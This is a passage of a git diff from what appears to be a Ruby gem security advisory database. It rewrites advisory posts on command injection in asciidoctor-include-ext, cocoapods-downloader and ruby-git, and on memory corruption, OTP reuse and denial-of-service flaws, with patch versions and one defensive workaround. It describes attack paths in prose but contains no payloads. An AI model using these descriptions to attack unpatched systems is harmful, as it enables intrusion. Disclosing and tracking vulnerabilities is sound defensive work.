-  title: Command Injection vulnerability in asciidoctor-include-ext
-  date: 2022-03-31
-  description: |
-    ### Impact
-
-    Applications using [Asciidoctor (Ruby)](https://github.com/asciidoctor/asciidoctor)
-    with [asciidoctor-include-ext](https://github.com/jirutka/asciidoctor-include-ext)
-    (prior to version 0.4.0), which render user-supplied input in AsciiDoc markup, may
-    allow an attacker to execute arbitrary system commands on the host operating system.
-    This attack is possible even when `allow-uri-read` is disabled!
-
-    ### Patches
-
-    The vulnerability has been fixed in commit c7ea001 (and further improved in cbaccf3),
-    which is included in version
-    [0.4.0](https://rubygems.org/gems/asciidoctor-include-ext/versions/0.4.0).
-
-    ### Workarounds
-
-    ```rb
-    require 'asciidoctor/include_ext'
-
-    class Asciidoctor::IncludeExt::IncludeProcessor
-      # Overrides superclass private method to mitigate Command Injection
-      # vulnerability in asciidoctor-include-ext <0.4.0.
-      def target_uri?(target)
-        target.downcase.start_with?('http://', 'https://') \
-          && URI.parse(target).is_a?(URI::HTTP)
-      rescue URI::InvalidURIError
-        false
-      end
-    end
-    ```
-
-    ### References
-
-    * https://sakurity.com/blog/2015/02/28/openuri.html
-  cvss_v3: 10.0
-  patched_versions:
-  - ">= 0.4.0"
-  related:
-    url:
-    - https://github.com/jirutka/asciidoctor-include-ext/commit/c7ea001a597c7033575342c51483dab7b87ae155
-    - https://github.com/jirutka/asciidoctor-include-ext/commit/cbaccf3de533cbca224bf61d0b74e4b84d41d8ee
----
+---
+layout: advisory
+title: 'CVE-2022-24803 (asciidoctor-include-ext): Command Injection vulnerability
+  in asciidoctor-include-ext'
+comments: false
+categories:
+- asciidoctor-include-ext
+advisory:
+  gem: asciidoctor-include-ext
+  cve: 2022-24803
+  ghsa: v222-6mr4-qj29
+  url: https://github.com/jirutka/asciidoctor-include-ext/security/advisories/GHSA-v222-6mr4-qj29
+  title: Command Injection vulnerability in asciidoctor-include-ext
+  date: 2022-03-31
+  description: |
+    ### Impact
+
+    Applications using [Asciidoctor (Ruby)](https://github.com/asciidoctor/asciidoctor)
+    with [asciidoctor-include-ext](https://github.com/jirutka/asciidoctor-include-ext)
+    (prior to version 0.4.0), which render user-supplied input in AsciiDoc markup, may
+    allow an attacker to execute arbitrary system commands on the host operating system.
+    This attack is possible even when `allow-uri-read` is disabled!
+
+    ### Patches
+
+    The vulnerability has been fixed in commit c7ea001 (and further improved in cbaccf3),
+    which is included in version
+    [0.4.0](https://rubygems.org/gems/asciidoctor-include-ext/versions/0.4.0).
+
+    ### Workarounds
+
+    ```rb
+    require 'asciidoctor/include_ext'
+
+    class Asciidoctor::IncludeExt::IncludeProcessor
+      # Overrides superclass private method to mitigate Command Injection
+      # vulnerability in asciidoctor-include-ext <0.4.0.
+      def target_uri?(target)
+        target.downcase.start_with?('http://', 'https://') \
+          && URI.parse(target).is_a?(URI::HTTP)
+      rescue URI::InvalidURIError
+        false
+      end
+    end
+    ```
+
+    ### References
+
+    * https://sakurity.com/blog/2015/02/28/openuri.html
+  cvss_v3: 10.0
+  patched_versions:
+  - ">= 0.4.0"
+  related:
+    url:
+    - https://github.com/jirutka/asciidoctor-include-ext/commit/c7ea001a597c7033575342c51483dab7b87ae155
+    - https://github.com/jirutka/asciidoctor-include-ext/commit/cbaccf3de533cbca224bf61d0b74e4b84d41d8ee
+---
diff --git a/advisories/_posts/2022-04-02-CVE-2022-21223.md b/advisories/_posts/2022-04-02-CVE-2022-21223.md
index 10d22913..f7711b04 100644
--- a/advisories/_posts/2022-04-02-CVE-2022-21223.md
+++ b/advisories/_posts/2022-04-02-CVE-2022-21223.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-21223 (cocoapods-downloader): Command injection in cocoapods-downloader'
-comments: false
-categories:
-- cocoapods-downloader
-advisory:
-  gem: cocoapods-downloader
-  cve: 2022-21223
-  ghsa: g397-v4w5-4m79
-  url: https://github.com/CocoaPods/cocoapods-downloader/pull/127
-  title: Command injection in cocoapods-downloader
-  date: 2022-04-02
-  description: |
-    The package cocoapods-downloader before 1.6.2 are vulnerable to Command
-    Injection via hg argument injection. When calling the download function (when using
-    hg), the url (and/or revision, tag, branch) is passed to the hg clone command in
-    a way that additional flags can be set. The additional flags can be used to perform
-    a command injection.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 1.6.2"
----
+---
+layout: advisory
+title: 'CVE-2022-21223 (cocoapods-downloader): Command injection in cocoapods-downloader'
+comments: false
+categories:
+- cocoapods-downloader
+advisory:
+  gem: cocoapods-downloader
+  cve: 2022-21223
+  ghsa: g397-v4w5-4m79
+  url: https://github.com/CocoaPods/cocoapods-downloader/pull/127
+  title: Command injection in cocoapods-downloader
+  date: 2022-04-02
+  description: |
+    The package cocoapods-downloader before 1.6.2 are vulnerable to Command
+    Injection via hg argument injection. When calling the download function (when using
+    hg), the url (and/or revision, tag, branch) is passed to the hg clone command in
+    a way that additional flags can be set. The additional flags can be used to perform
+    a command injection.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 1.6.2"
+---
diff --git a/advisories/_posts/2022-04-02-CVE-2022-24440.md b/advisories/_posts/2022-04-02-CVE-2022-24440.md
index 1e040cf7..8ce1f11a 100644
--- a/advisories/_posts/2022-04-02-CVE-2022-24440.md
+++ b/advisories/_posts/2022-04-02-CVE-2022-24440.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2022-24440 (cocoapods-downloader): Command injection in cocoapods-downloader'
-comments: false
-categories:
-- cocoapods-downloader
-advisory:
-  gem: cocoapods-downloader
-  cve: 2022-24440
-  ghsa: 7627-mp87-jf6q
-  url: https://github.com/CocoaPods/cocoapods-downloader/pull/124
-  title: Command injection in cocoapods-downloader
-  date: 2022-04-02
-  description: |
-    The package cocoapods-downloader before 1.6.0, from 1.6.2 and before
-    1.6.3 are vulnerable to Command Injection via git argument injection. When calling
-    the Pod::Downloader.preprocess_options function and using git, both the git and
-    branch parameters are passed to the git ls-remote subcommand in a way that additional
-    flags can be set. The additional flags can be used to perform a command injection.
-  cvss_v3: 8.1
-  unaffected_versions:
-  - ">= 1.6.0, < 1.6.2"
-  patched_versions:
-  - "= 1.6.0"
-  - ">= 1.6.3"
-  related:
-    url:
-    - https://github.com/CocoaPods/cocoapods-downloader/pull/128
----
+---
+layout: advisory
+title: 'CVE-2022-24440 (cocoapods-downloader): Command injection in cocoapods-downloader'
+comments: false
+categories:
+- cocoapods-downloader
+advisory:
+  gem: cocoapods-downloader
+  cve: 2022-24440
+  ghsa: 7627-mp87-jf6q
+  url: https://github.com/CocoaPods/cocoapods-downloader/pull/124
+  title: Command injection in cocoapods-downloader
+  date: 2022-04-02
+  description: |
+    The package cocoapods-downloader before 1.6.0, from 1.6.2 and before
+    1.6.3 are vulnerable to Command Injection via git argument injection. When calling
+    the Pod::Downloader.preprocess_options function and using git, both the git and
+    branch parameters are passed to the git ls-remote subcommand in a way that additional
+    flags can be set. The additional flags can be used to perform a command injection.
+  cvss_v3: 8.1
+  unaffected_versions:
+  - ">= 1.6.0, < 1.6.2"
+  patched_versions:
+  - "= 1.6.0"
+  - ">= 1.6.3"
+  related:
+    url:
+    - https://github.com/CocoaPods/cocoapods-downloader/pull/128
+---
diff --git a/advisories/_posts/2022-04-05-CVE-2022-24795.md b/advisories/_posts/2022-04-05-CVE-2022-24795.md
index bd74255c..8e8c032a 100644
--- a/advisories/_posts/2022-04-05-CVE-2022-24795.md
+++ b/advisories/_posts/2022-04-05-CVE-2022-24795.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2022-24795 (yajl-ruby): Reallocation bug can trigger heap memory corruption'
-comments: false
-categories:
-- yajl-ruby
-advisory:
-  gem: yajl-ruby
-  cve: 2022-24795
-  ghsa: jj47-x69x-mxrm
-  url: https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-mxrm
-  title: Reallocation bug can trigger heap memory corruption
-  date: 2022-04-05
-  description: |
-    The 1.x branch and the 2.x branch of [yajl](https://github.com/lloyd/yajl)
-    contain an integer overflow which leads to subsequent heap memory corruption
-    when dealing with large (~2GB) inputs.
-
-    ### Details
-
-    The [reallocation logic at yajl_buf.c#L64](https://github.com/brianmario/yajl-ruby/blob/7168bd79b888900aa94523301126f968a93eb3a6/ext/yajl/yajl_buf.c#L64)
-    may result in the `need` 32bit integer wrapping to 0 when `need` approaches
-    a value of 0x80000000 (i.e. ~2GB of data), which results in a reallocation
-    of buf->alloc into a small heap chunk.
-
-    These integers are declared as `size_t` in the 2.x branch of `yajl`, which
-    practically prevents the issue from triggering on 64bit platforms, however
-    this does not preclude this issue triggering on 32bit builds on which
-    `size_t` is a 32bit integer.
-
-    Subsequent population of this under-allocated heap chunk is based on the
-    original buffer size, leading to heap memory corruption.
-
-    ### Impact
-
-    We rate this as a moderate severity vulnerability which mostly impacts
-    process availability as we believe exploitation for arbitrary code
-    execution to be unlikely.
-
-    ### Patches
-
-    Patched in yajl-ruby 1.4.2
-
-    ### Workarounds
-
-    Avoid passing large inputs to YAJL
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 1.4.2"
-  related:
-    url:
-    - https://github.com/brianmario/yajl-ruby/blob/7168bd79b888900aa94523301126f968a93eb3a6/ext/yajl/yajl_buf.c#L64
----
+---
+layout: advisory
+title: 'CVE-2022-24795 (yajl-ruby): Reallocation bug can trigger heap memory corruption'
+comments: false
+categories:
+- yajl-ruby
+advisory:
+  gem: yajl-ruby
+  cve: 2022-24795
+  ghsa: jj47-x69x-mxrm
+  url: https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-mxrm
+  title: Reallocation bug can trigger heap memory corruption
+  date: 2022-04-05
+  description: |
+    The 1.x branch and the 2.x branch of [yajl](https://github.com/lloyd/yajl)
+    contain an integer overflow which leads to subsequent heap memory corruption
+    when dealing with large (~2GB) inputs.
+
+    ### Details
+
+    The [reallocation logic at yajl_buf.c#L64](https://github.com/brianmario/yajl-ruby/blob/7168bd79b888900aa94523301126f968a93eb3a6/ext/yajl/yajl_buf.c#L64)
+    may result in the `need` 32bit integer wrapping to 0 when `need` approaches
+    a value of 0x80000000 (i.e. ~2GB of data), which results in a reallocation
+    of buf->alloc into a small heap chunk.
+
+    These integers are declared as `size_t` in the 2.x branch of `yajl`, which
+    practically prevents the issue from triggering on 64bit platforms, however
+    this does not preclude this issue triggering on 32bit builds on which
+    `size_t` is a 32bit integer.
+
+    Subsequent population of this under-allocated heap chunk is based on the
+    original buffer size, leading to heap memory corruption.
+
+    ### Impact
+
+    We rate this as a moderate severity vulnerability which mostly impacts
+    process availability as we believe exploitation for arbitrary code
+    execution to be unlikely.
+
+    ### Patches
+
+    Patched in yajl-ruby 1.4.2
+
+    ### Workarounds
+
+    Avoid passing large inputs to YAJL
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 1.4.2"
+  related:
+    url:
+    - https://github.com/brianmario/yajl-ruby/blob/7168bd79b888900aa94523301126f968a93eb3a6/ext/yajl/yajl_buf.c#L64
+---
diff --git a/advisories/_posts/2022-04-07-CVE-2021-43177.md b/advisories/_posts/2022-04-07-CVE-2021-43177.md
index d6be1b58..e9a5d694 100644
--- a/advisories/_posts/2022-04-07-CVE-2021-43177.md
+++ b/advisories/_posts/2022-04-07-CVE-2021-43177.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2021-43177 (devise-two-factor): Improper one time password handling in
-  devise-two-factor'
-comments: false
-categories:
-- devise-two-factor
-advisory:
-  gem: devise-two-factor
-  cve: 2021-43177
-  ghsa: jm35-h8q2-73mp
-  url: https://github.com/tinfoil/devise-two-factor/security/advisories/GHSA-jm35-h8q2-73mp
-  title: Improper one time password handling in devise-two-factor
-  date: 2022-04-07
-  description: |
-    ### Impact
-
-    As a result of an incomplete fix for CVE-2015-7225, in versions of
-    devise-two-factor prior to 4.0.2 it is possible to reuse a One-Time-Password
-    (OTP) for one (and only one) immediately trailing interval.
-
-    ### Patches
-
-    This vulnerability has been patched in version 4.0.2 which was released on
-    March 24th, 2022. Individuals using this package are strongly encouraged to
-    upgrade as soon as possible.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 4.0.2"
-  related:
-    cve:
-    - 2015-7225
-    url:
-    - https://github.com/tinfoil/devise-two-factor/issues/106
----
+---
+layout: advisory
+title: 'CVE-2021-43177 (devise-two-factor): Improper one time password handling in
+  devise-two-factor'
+comments: false
+categories:
+- devise-two-factor
+advisory:
+  gem: devise-two-factor
+  cve: 2021-43177
+  ghsa: jm35-h8q2-73mp
+  url: https://github.com/tinfoil/devise-two-factor/security/advisories/GHSA-jm35-h8q2-73mp
+  title: Improper one time password handling in devise-two-factor
+  date: 2022-04-07
+  description: |
+    ### Impact
+
+    As a result of an incomplete fix for CVE-2015-7225, in versions of
+    devise-two-factor prior to 4.0.2 it is possible to reuse a One-Time-Password
+    (OTP) for one (and only one) immediately trailing interval.
+
+    ### Patches
+
+    This vulnerability has been patched in version 4.0.2 which was released on
+    March 24th, 2022. Individuals using this package are strongly encouraged to
+    upgrade as soon as possible.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 4.0.2"
+  related:
+    cve:
+    - 2015-7225
+    url:
+    - https://github.com/tinfoil/devise-two-factor/issues/106
+---
diff --git a/advisories/_posts/2022-04-11-CVE-2018-25032.md b/advisories/_posts/2022-04-11-CVE-2018-25032.md
index 19f10372..57ac5088 100644
--- a/advisories/_posts/2022-04-11-CVE-2018-25032.md
+++ b/advisories/_posts/2022-04-11-CVE-2018-25032.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2018-25032 (nokogiri): Out-of-bounds Write in zlib affects Nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2018-25032
-  ghsa: v6gp-9mmm-c6p5
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5
-  title: Out-of-bounds Write in zlib affects Nokogiri
-  date: 2022-04-11
-  description: |
-    ## Summary
-
-    Nokogiri v1.13.4 updates the vendored zlib from 1.2.11
-    to 1.2.12, which addresses [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032).
-    That CVE is scored as CVSS 7.4 "High" on the NVD record as of 2022-04-05.
-
-    Please note that this advisory only applies to the CRuby implementation of
-    Nokogiri `< 1.13.4`, and only if the packaged version of `zlib` is being used.
-    Please see [this document](https://nokogiri.org/LICENSE-DEPENDENCIES.html#default-platform-release-ruby)
-    for a complete description of which platform gems vendor `zlib`. If you've
-    overridden defaults at installation time to use system libraries instead of
-    packaged libraries, you should instead pay attention to your distro's `zlib`
-    release announcements.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= v1.13.4`.
-
-    ## Impact
-
-    ### [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032) in zlib
-
-    - **Severity**: High
-    - **Type**: [CWE-787](https://cwe.mitre.org/data/definitions/787.html)
-      Out of bounds write
-    - **Description**: zlib before 1.2.12 allows memory corruption when
-      deflating (i.e., when compressing) if the input has many distant matches.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.13.4"
-  related:
-    ghsa:
-    - jc36-42cf-vqwj
-    url:
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
-    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
----
+---
+layout: advisory
+title: 'CVE-2018-25032 (nokogiri): Out-of-bounds Write in zlib affects Nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2018-25032
+  ghsa: v6gp-9mmm-c6p5
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5
+  title: Out-of-bounds Write in zlib affects Nokogiri
+  date: 2022-04-11
+  description: |
+    ## Summary
+
+    Nokogiri v1.13.4 updates the vendored zlib from 1.2.11
+    to 1.2.12, which addresses [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032).
+    That CVE is scored as CVSS 7.4 "High" on the NVD record as of 2022-04-05.
+
+    Please note that this advisory only applies to the CRuby implementation of
+    Nokogiri `< 1.13.4`, and only if the packaged version of `zlib` is being used.
+    Please see [this document](https://nokogiri.org/LICENSE-DEPENDENCIES.html#default-platform-release-ruby)
+    for a complete description of which platform gems vendor `zlib`. If you've
+    overridden defaults at installation time to use system libraries instead of
+    packaged libraries, you should instead pay attention to your distro's `zlib`
+    release announcements.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= v1.13.4`.
+
+    ## Impact
+
+    ### [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032) in zlib
+
+    - **Severity**: High
+    - **Type**: [CWE-787](https://cwe.mitre.org/data/definitions/787.html)
+      Out of bounds write
+    - **Description**: zlib before 1.2.12 allows memory corruption when
+      deflating (i.e., when compressing) if the input has many distant matches.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.13.4"
+  related:
+    ghsa:
+    - jc36-42cf-vqwj
+    url:
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
+---
diff --git a/advisories/_posts/2022-04-11-CVE-2022-23437.md b/advisories/_posts/2022-04-11-CVE-2022-23437.md
index 1b3119c1..afbfcb5a 100644
--- a/advisories/_posts/2022-04-11-CVE-2022-23437.md
+++ b/advisories/_posts/2022-04-11-CVE-2022-23437.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2022-23437 (nokogiri): XML Injection in Xerces Java affects Nokogiri'
-comments: false
-categories:
-- nokogiri
-- jruby
-advisory:
-  gem: nokogiri
-  platform: jruby
-  cve: 2022-23437
-  ghsa: xxx9-3xcr-gjj3
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3
-  title: XML Injection in Xerces Java affects Nokogiri
-  date: 2022-04-11
-  description: |
-    ## Summary
-
-    Nokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to
-    2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437).
-    That CVE is scored as CVSS 6.5 "Medium" on the NVD record.
-
-    Please note that this advisory only applies to the **JRuby** implementation
-    of Nokogiri `< 1.13.4`.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= v1.13.4`.
-
-    ## Impact
-
-    ### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J
-
-    - **Severity**: Medium
-    - **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)
-    - **Description**: There's a vulnerability within the Apache Xerces Java
-      (XercesJ) XML parser when handling specially crafted XML document payloads.
-      This causes, the XercesJ XML parser to wait in an infinite loop, which may
-      sometimes consume system resources for prolonged duration. This vulnerability
-      is present within XercesJ version 2.12.1 and the previous versions.
-    - **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 1.13.4"
-  related:
-    ghsa:
-    - h65f-jvqw-m9fj
-    url:
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
-    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
----
+---
+layout: advisory
+title: 'CVE-2022-23437 (nokogiri): XML Injection in Xerces Java affects Nokogiri'
+comments: false
+categories:
+- nokogiri
+- jruby
+advisory:
+  gem: nokogiri
+  platform: jruby
+  cve: 2022-23437
+  ghsa: xxx9-3xcr-gjj3
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3
+  title: XML Injection in Xerces Java affects Nokogiri
+  date: 2022-04-11
+  description: |
+    ## Summary
+
+    Nokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to
+    2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437).
+    That CVE is scored as CVSS 6.5 "Medium" on the NVD record.
+
+    Please note that this advisory only applies to the **JRuby** implementation
+    of Nokogiri `< 1.13.4`.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= v1.13.4`.
+
+    ## Impact
+
+    ### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J
+
+    - **Severity**: Medium
+    - **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)
+    - **Description**: There's a vulnerability within the Apache Xerces Java
+      (XercesJ) XML parser when handling specially crafted XML document payloads.
+      This causes, the XercesJ XML parser to wait in an infinite loop, which may
+      sometimes consume system resources for prolonged duration. This vulnerability
+      is present within XercesJ version 2.12.1 and the previous versions.
+    - **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 1.13.4"
+  related:
+    ghsa:
+    - h65f-jvqw-m9fj
+    url:
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
+---
diff --git a/advisories/_posts/2022-04-11-CVE-2022-24836.md b/advisories/_posts/2022-04-11-CVE-2022-24836.md
index 7fac9335..b4d12b42 100644
--- a/advisories/_posts/2022-04-11-CVE-2022-24836.md
+++ b/advisories/_posts/2022-04-11-CVE-2022-24836.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2022-24836 (nokogiri): Inefficient Regular Expression Complexity in Nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2022-24836
-  ghsa: crjr-9rc5-ghw8
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5-ghw8
-  title: Inefficient Regular Expression Complexity in Nokogiri
-  date: 2022-04-11
-  description: |
-    ## Summary
-
-    Nokogiri `< v1.13.4` contains an inefficient regular expression that is
-    susceptible to excessive backtracking when attempting to detect encoding
-    in HTML documents.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= 1.13.4`.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.13.4"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/commit/e444525ef1634b675cd1cf52d39f4320ef0aecfd
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
-    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
----
+---
+layout: advisory
+title: 'CVE-2022-24836 (nokogiri): Inefficient Regular Expression Complexity in Nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2022-24836
+  ghsa: crjr-9rc5-ghw8
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5-ghw8
+  title: Inefficient Regular Expression Complexity in Nokogiri
+  date: 2022-04-11
+  description: |
+    ## Summary
+
+    Nokogiri `< v1.13.4` contains an inefficient regular expression that is
+    susceptible to excessive backtracking when attempting to detect encoding
+    in HTML documents.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= 1.13.4`.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.13.4"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/commit/e444525ef1634b675cd1cf52d39f4320ef0aecfd
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
+---
diff --git a/advisories/_posts/2022-04-11-CVE-2022-24839.md b/advisories/_posts/2022-04-11-CVE-2022-24839.md
index 5e130dec..50c1e4b4 100644
--- a/advisories/_posts/2022-04-11-CVE-2022-24839.md
+++ b/advisories/_posts/2022-04-11-CVE-2022-24839.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2022-24839 (nokogiri): Denial of Service (DoS) in Nokogiri on JRuby'
-comments: false
-categories:
-- nokogiri
-- jruby
-advisory:
-  gem: nokogiri
-  platform: jruby
-  cve: 2022-24839
-  ghsa: gx8x-g87m-h5q6
-  url: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv
-  title: Denial of Service (DoS) in Nokogiri on JRuby
-  date: 2022-04-11
-  description: |
-    ## Summary
-
-    Nokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to
-    `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv).
-    That CVE is rated 7.5 (High Severity).
-
-    See [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
-    for more information.
-
-    Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= 1.13.4`.
-
-    ## Impact
-
-    ### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml
-
-    - **Severity**: High 7.5
-    - **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption
-    - **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a
-      `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.
-    - **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.13.4"
-  related:
-    ghsa:
-    - gx8x-g87m-h5q6
-    url:
-    - https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
-    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
----
+---
+layout: advisory
+title: 'CVE-2022-24839 (nokogiri): Denial of Service (DoS) in Nokogiri on JRuby'
+comments: false
+categories:
+- nokogiri
+- jruby
+advisory:
+  gem: nokogiri
+  platform: jruby
+  cve: 2022-24839
+  ghsa: gx8x-g87m-h5q6
+  url: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv
+  title: Denial of Service (DoS) in Nokogiri on JRuby
+  date: 2022-04-11
+  description: |
+    ## Summary
+
+    Nokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to
+    `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv).
+    That CVE is rated 7.5 (High Severity).
+
+    See [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
+    for more information.
+
+    Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= 1.13.4`.
+
+    ## Impact
+
+    ### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml
+
+    - **Severity**: High 7.5
+    - **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption
+    - **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a
+      `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.
+    - **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.13.4"
+  related:
+    ghsa:
+    - gx8x-g87m-h5q6
+    url:
+    - https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+    - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ
+---
diff --git a/advisories/_posts/2022-04-20-CVE-2022-25648.md b/advisories/_posts/2022-04-20-CVE-2022-25648.md
index 1e54402e..49405efd 100644
--- a/advisories/_posts/2022-04-20-CVE-2022-25648.md
+++ b/advisories/_posts/2022-04-20-CVE-2022-25648.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2022-25648 (git): Command injection in ruby-git'
-comments: false
-categories:
-- git
-advisory:
-  gem: git
-  cve: 2022-25648
-  ghsa: 69p6-wvmq-27gg
-  url: https://github.com/ruby-git/ruby-git/pull/569
-  title: Command injection in ruby-git
-  date: 2022-04-20
-  description: |
-    The package git before 1.11.0 are vulnerable to Command Injection via
-    git argument injection. When calling the fetch(remote = 'origin', opts = {}) function,
-    the remote parameter is passed to the git fetch subcommand in a way that additional
-    flags can be set. The additional flags can be used to perform a command injection.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.11.0"
-  related:
-    url:
-    - https://github.com/ruby-git/ruby-git/releases/tag/v1.11.0
----
+---
+layout: advisory
+title: 'CVE-2022-25648 (git): Command injection in ruby-git'
+comments: false
+categories:
+- git
+advisory:
+  gem: git
+  cve: 2022-25648
+  ghsa: 69p6-wvmq-27gg
+  url: https://github.com/ruby-git/ruby-git/pull/569
+  title: Command injection in ruby-git
+  date: 2022-04-20
+  description: |
+    The package git before 1.11.0 are vulnerable to Command Injection via
+    git argument injection. When calling the fetch(remote = 'origin', opts = {}) function,
+    the remote parameter is passed to the git fetch subcommand in a way that additional
+    flags can be set. The additional flags can be used to perform a command injection.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.11.0"
+  related:
+    url:
